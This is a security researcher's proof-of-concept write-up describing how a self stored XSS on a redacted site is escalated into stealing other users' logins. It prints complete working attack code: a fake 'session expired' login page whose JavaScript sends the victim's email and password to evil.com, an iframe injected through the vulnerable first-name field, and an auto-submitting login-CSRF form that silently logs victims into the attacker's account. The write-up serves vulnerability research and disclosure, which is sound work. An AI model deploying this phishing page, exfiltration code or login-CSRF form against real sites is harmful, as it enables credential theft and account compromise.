Self XSS To Evil XSS

Saad Ahmed

Hi guys, I hope you are all doing well. This POC is about how I converted a self XSS into an "evil" XSS that hits other users. Let's assume the target site is PRIVATE.COM.

The first step was simply to sign up, log in, and start playing with the change-account-details functionality. After some time I found that the first name field is vulnerable to XSS, but the problem is that this is a self stored XSS: the payload only renders in my own account, so I needed a way to make it fire for other users. The first method I checked was CSRF against the account update request, but that functionality carries a CSRF token, so this method failed. Then I remembered the GEEK BOY POC: if the login form itself is not CSRF-protected, a victim can be silently logged into the attacker's account, and whatever is stored in that account's first name will render in the victim's browser.

So I created a simple HTML + JS page that asks for an email and password and steals whatever the victim types.

<!DOCTYPE html>
<html>
<head>
<title>XSS</title>
</head>
<body>

<!-- Fake "session expired" login form, hosted on the attacker's web host and loaded into the target site through the stored iframe payload -->
<center><div class="panel-body">
<h3>Something Went Wrong Please Login Again</h3>

<div class="login-group">
<label for="Vemail" class="control-label">Email</label>
<input id="Vemail" class="input span12" name="email" required="" type="email" value="" autofocus="">
</div>

<div class="login-group">
<label for="Vpass" class="control-label">Password</label>
<input id="Vpass" class="input span12" name="password" required="" type="password" value="">
<div class="alert alert-error error hide" id="error_missingPassword">Please enter your password</div>
</div>

<!-- There is no real form: the button only runs the JS below -->
<button class="action-button btn btn-primary login-button" buttontype="login" type="submit" onclick="myFunction()">Login</button>

</div></center>

<script>
function myFunction() {
  // read whatever the victim typed into the two fields
  var x = document.getElementById("Vemail").value;
  var y = document.getElementById("Vpass").value;
  var pwd = x + ":" + y;
  alert(pwd); // only here to show the captured value during the POC
  // exfiltrate by navigating to the attacker's server; encoded so characters such as '#', '?' or '/' in the password survive the URL
  window.location = "https://evil.com/" + encodeURIComponent(pwd);
}
</script>

</body>
</html>

This is a simple HTML page with two input fields and one button asking for Email and Password. The JS code reads the values of the input fields and sends them to the attacker's server. Upload this page to a web host.

Then simply put an iframe in the first name field that loads this page from the web host, so the fake login form appears inside the legitimate site.

This is how the rendered form looks (the screenshot is not reproduced here).

Everything is ready. Now all I need is to get the victim to submit the following login form, which carries my own credentials.

<html>
<body>
<!-- Login CSRF: POSTs the attacker's own credentials to the target site's login endpoint (PRIVATE.COM in this write-up; the path is illustrative) -->
<form action="https://PRIVATE.COM/login/submit" method="POST">
<input type="hidden" name="email" value="email@gmail.com" />
<input type="hidden" name="password" value="password" />
<input type="submit" value="Submit request" />
</form>
<!-- submit automatically so the victim only has to open the page -->
<script>document.forms[0].submit();</script>
</body>
</html>

This form simply logs the victim into my account without them knowing. Once they are in my account they see the "Something Went Wrong" message with the input fields (rendered from my stored first name) and try to log in again. When they do, the JS code grabs the email and password they entered and sends them to the attacker's server.

I hope you like it :)

./Logout
